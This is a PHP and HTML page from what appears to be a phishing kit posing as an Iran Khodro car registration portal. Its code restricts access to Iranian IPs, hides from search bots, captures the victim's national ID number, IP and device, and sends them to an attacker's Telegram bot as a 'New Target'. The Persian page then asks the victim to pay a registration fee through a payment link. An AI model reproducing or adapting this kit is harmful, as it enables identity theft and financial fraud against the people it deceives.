<?php
function ip_iran($ip)
{
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, "http://ip-api.com/csv/" . $ip);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
    $exec = curl_exec($curl);
    curl_close($curl);
    $explode = explode(",", $exec);
    
    if (strtolower($explode[1]) == "iran")
    {
        return true;
    }
    else
    {
        return false;
    }
    
    return $explode[1];
}

if(ip_iran($_SERVER['REMOTE_ADDR']) == 'Iran')
    {
    }
    else
    {
        header('Location: 403.html');
    }
   
include('antibots.php');
include('info.php');

if(strpos($_SERVER['HTTP_USER_AGENT'], 'GoogleBot') !==false) {
    header('HTTP/1.0 404 Not Found');
    exit();
}

if (checkbots() == true){
    header('HTTP/1.0 404 Not Found');
    exit();
}

$name = $_POST['Phone'];
function GetIp()
{
    $ip = $_SERVER['REMOTE_ADDR'];
    return $ip;
}
$ip = GetIp();
$Device = rtrim(explode(' ',$_SERVER['HTTP_USER_AGENT'])[4], ")");

     
$message = "
🏦 #New‌Target 🚨
➖➖➖➖➖
• CD Meli: `$name`
• IP : $ip
• Device : $Device
➖➖➖➖➖
@X405U7 🎋 ";

    file_get_contents("https://api.telegram.org/bot$TOKEN/sendMessage?parse_mode=markdown&chat_id=$ID&text=" . urlencode($message));
    


        // Use cURL to send the message to the Telegram bot


header('Content-Type: text/html; charset=utf-8');


?>

<html lang="en-US">

    <head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
		<meta name='robots' content='max-image-preview:large' />

	<title>انجام تراکنش</title>

</style>
	<link rel='stylesheet' id='wp-block-library-css'  href='./css/style1.min.css?ver=5.7.8' type='text/css' media='all' />
<link rel='stylesheet' id='elementor-icons-ekiticons-css'  href='./css/ekiticons.css?ver=5.9.0' type='text/css' media='all' />

<link rel='stylesheet' id='hostinza-style-css'  href='./css/style.css?ver=1.4.2' type='text/css' media='all' />


</script>
<style id="sccss">body{
	text-align: end
}

#field_1_4.gfield input {
    border-radius: 5px;
}  

#field_1_6.gfield input {
    border-radius: 5px;
}
#field_1_10.gfield textarea {
    border-radius: 5px;
}

#gform_1{
	direction:rtl
}
@font-face {
    font-family: myFont;
    src: url('font/wYekan.ttf');
}
body {
    font-family: myFont;
}
.spacer.gfield{
	display:none
}

form.elementor-form {
    direction: rtl;
}

.elementor-widget-icon-list .elementor-widget-container{direction:ltr}

.ts .elementor-widget-wrap{direction: rtl}</style><style id="kirki-inline-styles">.header-transparent .xs-top-bar{background-color:rgba(0,0,0,0.25);}.xs-top-bar{background-color:rgba(0,0,0,0.25);}footer.xs-footer-section.footer-group a{color:#d7d7d7;}footer.xs-footer-section.footer-v2 a{color:#d7d7d7;}body{font-family:Georgia,Times,"Times New Roman",serif;}</style>    </head>


</h3>		</div>
				</div>
					</div>
		</div>
							</div>
		</section>
				<section class="elementor-section elementor-top-section elementor-element elementor-element-3861e51 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="3861e51" data-element_type="section" data-settings="{&quot;ekit_has_onepagescroll_dot&quot;:&quot;yes&quot;}">
						<div class="elementor-container elementor-column-gap-default">
					<div class="elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-86a8f4f" data-id="86a8f4f" data-element_type="column">
			<div class="elementor-widget-wrap elementor-element-populated">
								<div class="elementor-element elementor-element-aa44bc5 elementor-widget elementor-widget-xs-call-to-action-box" data-id="aa44bc5" data-element_type="widget" data-widget_type="xs-call-to-action-box.default">
				<div class="elementor-widget-container">
			        <div class="xs-feature-group">
            <div class="media">
                <div class="feature-img d-flex">
                    <img width="150" height="150" src="IMG/eog.png" class="attachment-thumbnail size-thumbnail" alt="" loading="lazy" sizes="(max-width: 150px) 100vw, 150px" />                </div>
                <div class="media-body feature-content">
                    <p>
                     
  متقاضی گرامی مشخصات هویتی شما ثبت گردید
                </p>
<p style="text-align: center; color: white; text-shadow: 2px 2px 4px rgba(0, 0, 0, 0.5); font-weight: bold;">متقاضی گرامی شما هزینه ثبت نام خود را پرداخت نکرده اید</p>

	<p>
 اطلاعات هویتی شما ثبت گردد لطفا جهت تکمیل ثبت نام درخواست محصولات ایران خودرو هزینه ثبت نام خود را به مبلغ 5,000 هزار تومان پرداخت نمایید‌ سپس پیامک تکمیلی از طریق سامانه ایران خودرو برای شما اطلاع رسانی می گردد.
                    <div class="xs-btn-wraper">
                        <a href="./payment" class="btn btn-secondary">پرداخت هزینه ثبت نام</a>
                    </div>
                </div>
            </div>
            <span class="icon icon-dollar watermark-icon"></span>
 		<style>
@font-face {
    font-family: myFont;
    src: url('font/Shabnam-FD.ttf');
}
body {
    font-family: myFont;
}
</style>
			</body>
</html>